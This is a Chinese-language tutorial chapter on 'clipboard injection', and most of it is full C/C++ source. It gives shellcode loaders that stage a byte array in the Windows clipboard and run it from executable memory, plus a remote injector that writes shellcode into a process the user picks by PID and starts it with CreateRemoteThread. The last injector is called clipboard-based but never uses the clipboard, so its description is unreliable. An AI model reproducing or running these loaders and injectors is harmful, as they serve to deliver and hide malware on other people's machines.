13-剪贴板注入（Clipboard Injection）

一、前言

本节涉及 进程间通信（IPC），剪贴板是进程间通信的方法之一，其实注册表也可以作为进程间通信的桥梁。

如果可以通过进程间通信获得全局内存的句柄，就可以共享内存中的shellcode，一般全局内存是不可执行的，记得复制到具有可执行权限的内存或者说用 VirtualProtect/VirtualProtectEx ，当然这只是作为拓展思路，本文用的不是这个方法。进程间通信当然不局限于传输shellcode。

剪贴板：是一组功能和使应用程序来传输的数据消息。由于所有应用程序都可以访问剪贴板，因此可以轻松地在应用程序之间或应用程序内传输数据。

剪贴板的数据格式：文本、图片、程序

注册剪切板格式：我们可以注册一个新的剪切板格式来存放我们的数据

本节介绍的执行链与前面介绍的并没有什么区别，但是学习到了一个可以分配全程内存的API，GlobalAlloc：globalAlloc 函数 (winbase.h) - Win32 apps | Microsoft Learn

二、代码实现

2.1 单进程

#include <windows.h>
#include <stdio.h>
#include <cstdlib> // 添加此行以包含 malloc 的定义

typedef struct {
    unsigned char* payload; // shellcode
    size_t length;         // shellcode 长度
    int key;               // 其他参数
} Payload;

// 假设 spawn 函数的声明
void spawn(unsigned char* buffer, size_t length, int key);

void ClipboardOperation(Payload* payload) {
    HGLOBAL hglb;
    LPVOID lptstr;
    SYSTEMTIME systemTime;

    // 打开剪贴板
    if (!OpenClipboard(NULL)) {
        fprintf(stderr, "Failed to open clipboard. Error: %d\n", GetLastError());
        return;
    }

    // 读取剪贴板内容
    hglb = GetClipboardData(CF_TEXT);
    if (hglb != NULL) {
        lptstr = GlobalLock(hglb);
        if (lptstr != NULL) {
            GetLocalTime(&systemTime);
            GlobalUnlock(hglb);
        }
    }

    // 清空剪贴板
    EmptyClipboard();

    // 分配内存并复制 shellcode 到剪贴板
    HGLOBAL hGlobalCopy = GlobalAlloc(GMEM_MOVEABLE, payload->length);
    if (hGlobalCopy == NULL) {
        fprintf(stderr, "GlobalAlloc failed. Error: %d\n", GetLastError());
        CloseClipboard();
        return;
    }

    LPVOID lpCopy = GlobalLock(hGlobalCopy);
    if (lpCopy != NULL) {
        memcpy(lpCopy, payload->payload, payload->length);
        GlobalUnlock(hGlobalCopy);
    }

    // 设置剪贴板数据
    if (SetClipboardData(CF_TEXT, hGlobalCopy) == NULL) {
        fprintf(stderr, "SetClipboardData failed. Error: %d\n", GetLastError());
        GlobalFree(hGlobalCopy);
        CloseClipboard();
        return;
    }

    // 读取剪贴板数据到 buffer
    HGLOBAL hGlobal = GetClipboardData(CF_TEXT);
    if (hGlobal != NULL) {
        lptstr = GlobalLock(hGlobal);
        if (lptstr != NULL) {
            unsigned char* buffer = (unsigned char*)malloc(payload->length);
            if (buffer) {
                memcpy(buffer, lptstr, payload->length);
                GlobalUnlock(hGlobal);

                // 调用 spawn 函数
                spawn(buffer, payload->length, payload->key);

                free(buffer); // 释放分配的内存
            }
            else {
                fprintf(stderr, "Failed to allocate memory for buffer.\n");
            }
        }
    }

    // 清空剪贴板并关闭
    EmptyClipboard();
    CloseClipboard();
}

void spawn(unsigned char* buffer, size_t length, int key) {
    // 创建一个可执行的内存区域
    DWORD oldProtect;
    LPVOID execMem = VirtualAlloc(NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (execMem == NULL) {
        fprintf(stderr, "Failed to allocate executable memory. Error: %d\n", GetLastError());
        return;
    }

    // 将 shellcode 复制到可执行内存区域
    memcpy(execMem, buffer, length);

    // 创建一个新的线程来执行 shellcode
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)execMem, NULL, 0, NULL);

    if (hThread == NULL) {
        fprintf(stderr, "Failed to create thread. Error: %d\n", GetLastError());
        VirtualFree(execMem, 0, MEM_RELEASE);
        return;
    }

    // 等待线程执行完成
    WaitForSingleObject(hThread, INFINITE);

    // 清理
    CloseHandle(hThread);
    VirtualFree(execMem, 0, MEM_RELEASE);
}

int main() {

    unsigned char shellcode[] = {
            0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A,
    0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC,
    0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48,
    0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
    0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B,
    0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24,
    0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C,
    0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
    0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7,
    0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E,
    0x5B, 0x5A, 0x59, 0x58, 0xC3
    };
    // 示例 payload 初始化
    Payload payload;
    payload.payload = (unsigned char*)shellcode; // 示例 shellcode
    payload.length = strlen((char*)payload.payload);
    payload.key = 123; // 示例 key

    ClipboardOperation(&payload);
    return 0;
}

2.2 多进程

写入shellcode

#include <windows.h>
#include <iostream>

unsigned char shellcode[] = {
       0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A,
       0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28,
       0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B,
       0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E,
       0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74,
       0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F,
       0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07,
       0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C,
       0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99,
       0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B,
       0x5A, 0x59, 0x58, 0xC3
};

int main() {
    // 打开剪贴板
    if (!OpenClipboard(NULL)) {
        std::cerr << "Failed to open clipboard. Error: " << GetLastError() << std::endl;
        return 1;
    }

    // 清空剪贴板
    EmptyClipboard();

    // 分配全局内存，sizeof(shellcode)+1是关键，因为第sizeof(shellcode)他还填充为00截断，tmd搞了一下午才明白
    HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, sizeof(shellcode)+1);
    if (hGlob == NULL) {
        std::cerr << "GlobalAlloc failed. Error: " << GetLastError() << std::endl;
        CloseClipboard();
        return 1;
    }

    // 锁定内存并复制 shellcode
    memcpy(GlobalLock(hGlob), shellcode, sizeof(shellcode));
    GlobalUnlock(hGlob);

    // 设置剪贴板数据
    if (SetClipboardData(CF_TEXT, hGlob) == NULL) {
        std::cerr << "SetClipboardData failed. Error: " << GetLastError() << std::endl;
        GlobalFree(hGlob);
        CloseClipboard();
        return 1;
    }
    // 关闭剪贴板
    CloseClipboard();
    std::cout << "Shellcode copied to clipboard." << std::endl;
    return 0;
}

读取并执行shellcode

#include <windows.h>
#include <iostream>
int main() {
    // 打开剪贴板
    if (!OpenClipboard(NULL)) {
        std::cerr << "OpenClipboard failed. Error: " << GetLastError() << std::endl;
        return 1;
    }

    // 获取剪贴板数据
    HGLOBAL hGlobal = GetClipboardData(CF_TEXT);
    if (hGlobal == NULL) {
        std::cerr << "GetClipboardData failed. Error: " << GetLastError() << std::endl;
        CloseClipboard();
        return 1;
    }

    // 锁定内存并获取 shellcode 指针
    void* pGlobal = GlobalLock(hGlobal);
    if (pGlobal == NULL) {
        std::cerr << "GlobalLock failed. Error: " << GetLastError() << std::endl;
        CloseClipboard();
        return 1;
    }

    // 获取数据的大小
    SIZE_T dataSize = GlobalSize(hGlobal);
    if (dataSize == 0) {
        std::cerr << "GlobalSize failed. Error: " << GetLastError() << std::endl;
        GlobalUnlock(hGlobal); // 如果需要，解锁内存
        CloseClipboard();
        return 1;
    }
    // 分配可执行内存
    void* pExec = VirtualAlloc(NULL, dataSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pExec == NULL) {
        std::cerr << "VirtualAlloc failed. Error: " << GetLastError() << std::endl;
        GlobalUnlock(hGlobal);
        CloseClipboard();
        return 1;
    }

    // 复制 shellcode 到可执行内存
    memcpy(pExec, pGlobal, dataSize);

    // 解锁剪贴板内存
    GlobalUnlock(hGlobal);
    CloseClipboard();

    // 创建一个线程执行内存中的代码
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pExec, NULL, 0, NULL);

    // 等待线程执行完成
    WaitForSingleObject(hThread, INFINITE);

    // 释放内存
    VirtualFree(pExec, 0, MEM_RELEASE);

    // 释放内存
    return 0;
}

2.3 一个进程完成shellcode注入到另一个进程

#include <windows.h>
#include <iostream>
#include <tlhelp32.h>

// Shellcode
unsigned char shellcode[] = {
            0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A,
    0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC,
    0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48,
    0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
    0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B,
    0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24,
    0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C,
    0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
    0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7,
    0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E,
    0x5B, 0x5A, 0x59, 0x58, 0xC3
};

class ClipboardInjector {
private:
    const unsigned char* m_shellcode;
    size_t m_shellcodeSize;

public:
    ClipboardInjector(const unsigned char* shellcode, size_t size)
        : m_shellcode(shellcode), m_shellcodeSize(size) {}

    bool InjectViaClipboard(DWORD targetPid) {
        // 打开目标进程
        HANDLE hProcess = OpenProcess(
            PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
            FALSE,
            targetPid
        );

        if (!hProcess) {
            return false;
        }

        // 在目标进程中分配内存
        LPVOID remoteBuffer = VirtualAllocEx(
            hProcess,
            NULL,
            sizeof(shellcode),
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE
        );

        if (!remoteBuffer) {
            CloseHandle(hProcess);
            return false;
        }

        // 写入 shellcode 到目标进程
        SIZE_T bytesWritten;
        BOOL writeResult = WriteProcessMemory(
            hProcess,
            remoteBuffer,
            shellcode,
            sizeof(shellcode),
            &bytesWritten
        );

        if (!writeResult) {
            VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
            CloseHandle(hProcess);
            return false;
        }

        // 获取 kernel32.dll 中的函数地址
        HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
        FARPROC pOpenClipboard = GetProcAddress(hKernel32, "OpenClipboard");
        FARPROC pGetClipboardData = GetProcAddress(hKernel32, "GetClipboardData");
        FARPROC pCloseClipboard = GetProcAddress(hKernel32, "CloseClipboard");

        // 创建远程线程
        HANDLE hRemoteThread = CreateRemoteThread(
            hProcess,
            NULL,
            0,
            (LPTHREAD_START_ROUTINE)remoteBuffer,
            NULL,
            0,
            NULL
        );

        if (!hRemoteThread) {
            VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
            CloseHandle(hProcess);
            return false;
        }

        // 等待线程结束
        WaitForSingleObject(hRemoteThread, INFINITE);

        // 清理资源
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hRemoteThread);
        CloseHandle(hProcess);

        return true;
    }
};



int main() {

    // 用户输入被注入进程的PID
    DWORD PID;
    std::cout << "请输入被注入进程的PID：";
    std::cin >> PID;

    // 创建剪贴板注入器
    ClipboardInjector injector(shellcode, sizeof(shellcode)+1);

    // 执行注入
    if (injector.InjectViaClipboard(PID)) {
        std::wcout << L"注入成功!" << std::endl;
    }
    else {
        std::wcerr << L"注入失败!" << std::endl;
        return 1;
    }

    return 0;
}